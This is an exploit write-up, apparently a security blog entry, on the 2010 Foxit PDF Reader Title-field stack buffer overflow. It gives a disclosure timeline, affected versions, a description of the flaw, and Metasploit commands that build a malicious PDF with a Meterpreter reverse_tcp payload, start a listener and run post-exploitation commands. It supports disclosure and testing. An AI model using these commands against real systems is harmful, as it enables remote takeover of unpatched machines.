Timeline :
Vulnerability reported to vendor by offsec before the public release on Exploit-DB
Vendor released new version the 2010-09-29
dookie & Sud0 exploit release on Exploit-DB the 2010-11-13
Metasploit exploit released the 2010-11-22
PoC provided by :
dookie
Sud0
corelanc0d3r
jduck
Reference(s) :
Affected version(s) :
Foxit PDF Reader prior to version 4.2.0.0928
Tested on Windows 7 Integral with :
Foxit PDF Reader 4.1.1.0805
Description :
This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field. This results in overwriting a structured exception handler record. NOTE: This exploit does not use javascript.
Commands :
use exploit/windows/fileformat/foxit_title_bof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploituse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -jsysinfo
getuid